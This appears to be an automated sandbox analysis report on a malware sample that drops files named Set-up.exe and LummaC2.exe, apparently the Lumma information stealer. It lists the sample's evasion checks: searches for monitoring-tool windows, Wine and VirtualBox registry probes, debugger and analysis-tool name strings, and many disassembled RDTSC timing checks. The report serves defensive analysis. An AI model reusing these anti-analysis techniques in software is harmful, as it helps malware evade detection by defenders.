Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 3_3_009EC350 push esp; ret	3_3_009EC351

Source: Cph7VEeu1r.exe

Static PE information: section name: awwpolhe entropy: 7.953438660745263

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: Cph7VEeu1r.exe	Binary or memory string: SBIEDLL.DLL
Source: Cph7VEeu1r.exe, 00000000.00000003.1437130428.0000000005770000.00000004.00001000.00020000.00000000.sdmp, Cph7VEeu1r.exe, 00000000.00000002.1478111913.00000000008E2000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLLN@
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: Cph7VEeu1r.exe, 00000000.00000003.1443586702.00000000077EF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000003.00000000.1451310469.0000000000F9B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112DC4E second address: 112DC58 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112DC58 second address: 112DC70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A7Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F66E8B84A76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112CDCA second address: 112CDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112CF1D second address: 112CF3E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F66E8B84A85h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112CF3E second address: 112CF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F66E96D98D6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112CF4C second address: 112CF6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8B84A89h 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112CF6A second address: 112CF70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112D239 second address: 112D23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112D23F second address: 112D26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98E7h 0x00000009 jng 00007F66E96D98D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007F66E96D98D6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 112D26B second address: 112D275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 113057B second address: 113060B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov ecx, dword ptr [ebp+122D380Ah] 0x0000000e push 00000000h 0x00000010 jmp 00007F66E96D98E8h 0x00000015 push C223B2C3h 0x0000001a ja 00007F66E96D98E4h 0x00000020 add dword ptr [esp], 3DDC4DBDh 0x00000027 push 00000003h 0x00000029 jmp 00007F66E96D98DFh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F66E96D98D8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jne 00007F66E96D98D9h 0x00000050 push 00000003h 0x00000052 push A54ED71Ah 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 113060B second address: 113060F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 113060F second address: 1130615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130615 second address: 113062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8B84A82h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11306BA second address: 11306C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11306C0 second address: 1130718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F66E8B84A8Fh 0x0000000b jmp 00007F66E8B84A89h 0x00000010 popad 0x00000011 nop 0x00000012 push 00000000h 0x00000014 call 00007F66E8B84A81h 0x00000019 cld 0x0000001a pop esi 0x0000001b jc 00007F66E8B84A7Ch 0x00000021 mov dword ptr [ebp+122D29A4h], ecx 0x00000027 push 1AD178C1h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jnp 00007F66E8B84A76h 0x00000035 push ecx 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130718 second address: 113071D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 113071D second address: 1130723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130723 second address: 1130787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 1AD17841h 0x0000000e mov edi, dword ptr [ebp+122D3A22h] 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F66E96D98D8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov esi, dword ptr [ebp+122D3A16h] 0x00000036 push 00000000h 0x00000038 pushad 0x00000039 jg 00007F66E96D98D7h 0x0000003f sub dword ptr [ebp+122D1F83h], edi 0x00000045 popad 0x00000046 push 00000003h 0x00000048 mov edi, 59D054D0h 0x0000004d push 8D444730h 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130787 second address: 113078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130852 second address: 1130858 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130858 second address: 1130872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130872 second address: 113087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 113087B second address: 113087F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130972 second address: 1130978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1130978 second address: 11309AB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F66E8B84A76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 69BC196Dh 0x00000013 sub edx, dword ptr [ebp+122D392Ah] 0x00000019 lea ebx, dword ptr [ebp+124463B2h] 0x0000001f jmp 00007F66E8B84A7Eh 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11309AB second address: 11309B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1142291 second address: 1142295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11509C0 second address: 11509C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11509C4 second address: 11509D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F66E8B84A7Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11509D9 second address: 11509E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11509E2 second address: 1150A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F66E8B84A7Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F66E8B84A88h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1150A13 second address: 1150A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F66E96D98D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1120D79 second address: 1120D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1120D82 second address: 1120D88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114E7F2 second address: 114E811 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8B84A85h 0x00000007 jno 00007F66E8B84A76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114E811 second address: 114E816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114E816 second address: 114E826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114E826 second address: 114E82A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114E82A second address: 114E82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114E82E second address: 114E85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F66E96D98DDh 0x0000000b pushad 0x0000000c jmp 00007F66E96D98E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114EC66 second address: 114EC77 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F66E8B84A76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114EC77 second address: 114EC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114EC7D second address: 114EC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F24C second address: 114F255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F3E9 second address: 114F3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F3F3 second address: 114F3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F502 second address: 114F515 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8B84A76h 0x00000008 jo 00007F66E8B84A76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F682 second address: 114F69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E96D98E4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F69C second address: 114F6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F6A1 second address: 114F6AB instructions: 0x00000000 rdtsc 0x00000002 jne 00007F66E96D98DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F6AB second address: 114F6B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F6B3 second address: 114F6B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114F986 second address: 114F98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 111A1F4 second address: 111A1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 114FAF3 second address: 114FAFD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F66E8B84A76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11500BE second address: 11500EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F66E96D98D6h 0x00000009 jnl 00007F66E96D98D6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F66E96D98E5h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11500EA second address: 11500EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11500EE second address: 1150102 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66E96D98D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F66E96D98D6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11503D0 second address: 11503F4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F66E8B84A78h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F66E8B84A82h 0x00000011 jl 00007F66E8B84A76h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11503F4 second address: 1150412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E96D98DEh 0x00000007 ja 00007F66E96D98D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 1150552 second address: 1150572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F66E8B84A87h 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 115084F second address: 1150868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007F66E96D98D6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11559D7 second address: 11559DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11559DB second address: 11559E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cph7VEeu1r.exe	RDTSC instruction interceptor: First address: 11559E1 second address: 11559EB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F66E8B84A7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
